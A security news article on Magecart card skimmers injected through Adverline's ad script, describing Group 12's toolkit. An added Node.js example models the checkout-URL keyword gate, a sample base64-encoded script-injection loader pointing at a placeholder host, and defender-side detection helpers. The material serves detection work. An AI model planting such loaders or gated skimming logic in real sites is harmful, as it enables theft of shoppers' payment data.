The Magecart card-skimming crime conglomerate has changed tactics in recent campaigns, injecting malicious code into a third-party JavaScript library that e-commerce websites load to serve advertisements.
Typically, Magecart subgroups compromise targeted websites one at a time and inject skimming code directly into each site; the code then harvests payment-card data from the online checkout pages.
According to Trend Micro, campaigns surfacing in January instead compromised a third-party library (the ad-serving script distributed by Adverline), so every website that embeds the script loads the skimming code. It is an efficient tactic: it netted 277 different e-commerce websites in less than a week.
Magecart, in operation since 2015, continues to present an insidious threat and has been blamed for an array of recent breaches, including one of the most prolific card-stealing operations seen in the wild to date. The group is famously made up of dozens of subgroups; researchers from Trend Micro believe this particular campaign was carried out by Magecart Group 5 (the same crew behind the Ticketmaster breach), or Group 12 (a relatively new Magecart cell).
Trend Micro reported that Adverline handled the incident and immediately carried out the necessary remediation in coordination with CERT La Poste, so the affected websites are now clean.
Magecart Group 12
The team also examined Magecart Group 12’s toolkit, since this subgroup is a relatively new addition to the Magecart umbrella. Researchers found that it uses a skimming toolkit built from two obfuscated scripts.
“The first script is mostly for anti-reversing while the second script is the main data-skimming code,” according to the analysis. “They also include code integrity checking that detects if the script is modified. The check is done by calculating a hash value of the script section, and stops the execution of the script if it finds that it doesn’t match the original hash.”
Interestingly, once loaded, the main skimming code first checks whether it is running on an appropriate shopping-cart page before it does anything else.
“[This is done] by detecting related strings in the URL like ‘checkout,’ ‘billing’ and ‘purchase,’ among others,” Trend Micro analysts explained. “Also of note are the strings ‘panier,’ which means ‘basket’ in French, and ‘kasse,’ or ‘checkout’ in German.” If it determines that it’s in the right place, the script then sets about copying both the form name and values keyed in by the user.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed,” explained Yonathan Klijnsma, researcher at RiskIQ, which partnered with Trend Micro to examine the new campaigns. “Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page.”
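The URL gate quoted above and the base64-encoded loader snippet Klijnsma describes, as an added example that is not part of the original article and is not code from Trend Micro, RiskIQ or the skimmer itself. It models both behaviours as plain Node.js functions and adds a defender-side triage helper that finds base64 literals decoding to a URL and quoted gate keywords in captured script text. The keyword list holds only the five strings the analysis names (the real list is longer), and every script sample and .invalid domain below is constructed; nothing is fetched or captured.

```javascript
// Added example for this article, not code from Trend Micro, RiskIQ or the skimmer.
// Models two behaviours from the analysis so they can be studied offline in Node.js:
//  1. the page gate that keys on URL substrings such as 'checkout', 'panier', 'kasse';
//  2. the loader pattern of a base64-encoded resource URL decoded at runtime,
//     approached from the defender's side (find such literals in captured script text).
// All sample script text and the .invalid domain names are constructed.

// Keywords quoted in the analysis. The real list is longer ("among others") and not on the page.
const CHECKOUT_KEYWORDS = ['checkout', 'billing', 'purchase', 'panier', 'kasse'];

// Skimmer-side gate: case-insensitive substring match over the whole URL.
// This is why the skimmer stays silent when an analyst loads a home or product page.
function looksLikeCheckoutPage(url) {
  const haystack = String(url).toLowerCase();
  return CHECKOUT_KEYWORDS.some((kw) => haystack.includes(kw));
}

// Defender-side: quoted base64 literals long enough to hold a URL; short tokens are ignored.
const B64_LITERAL = /["']([A-Za-z0-9+/]{16,}={0,2})["']/g;

// Decode every candidate literal and keep only those that turn into an http(s) URL.
// Returns [{ encoded, decoded }]; binary garbage that merely looks like base64 is dropped.
function findEncodedScriptUrls(scriptText) {
  const hits = [];
  for (const m of String(scriptText).matchAll(B64_LITERAL)) {
    const encoded = m[1];
    const decoded = Buffer.from(encoded, 'base64').toString('utf8');
    if (/^https?:\/\/[^\s"'<>]+$/.test(decoded)) hits.push({ encoded, decoded });
  }
  return hits;
}

// Defender-side: which known gate keywords appear as quoted string literals in the script.
function findGateKeywords(scriptText) {
  const lower = String(scriptText).toLowerCase();
  return CHECKOUT_KEYWORDS.filter((kw) => lower.includes(`'${kw}'`) || lower.includes(`"${kw}"`));
}

// Combine both indicators. The loader and the main skimmer are separate scripts,
// so either indicator on its own is enough to warrant a closer look.
function triageScript(scriptText) {
  const encodedUrls = findEncodedScriptUrls(scriptText);
  const gateKeywords = findGateKeywords(scriptText);
  return { encodedUrls, gateKeywords, suspicious: encodedUrls.length > 0 || gateKeywords.length > 0 };
}

// Constructed samples. The loader carries its resource URL base64-encoded rather than as a
// literal src attribute, which is the pattern RiskIQ describes for Group 12.
const SAMPLE_RESOURCE_URL = 'https://cdn.example.invalid/assets/lib.js';
const SAMPLE_LOADER = `var s=document.createElement('script');` +
  `s.src=atob('${Buffer.from(SAMPLE_RESOURCE_URL).toString('base64')}');` +
  `document.head.appendChild(s);`;
const SAMPLE_SKIMMER_FRAGMENT =
  `if(['checkout','billing','panier'].some(function(k){return location.href.indexOf(k)>-1})){/* skim */}`;
const BENIGN_SCRIPT = `window.dataLayer=window.dataLayer||[];dataLayer.push({event:'pageview'});`;

console.log(looksLikeCheckoutPage('https://shop.example.invalid/Panier/step2')); // true
console.log(looksLikeCheckoutPage('https://shop.example.invalid/blog/news'));    // false
console.log(triageScript(SAMPLE_LOADER));
console.log(triageScript(SAMPLE_SKIMMER_FRAGMENT));
console.log(triageScript(BENIGN_SCRIPT).suspicious); // false
```

The decode step is deliberately strict: a long base64 literal that decodes to bytes other than an http(s) URL is ignored, so minified vendor code with embedded data blobs does not flood the output. Run the triage over every inline script and every first-party-looking include on a checkout page; a legitimate tag manager has no reason to hide its resource URL behind atob().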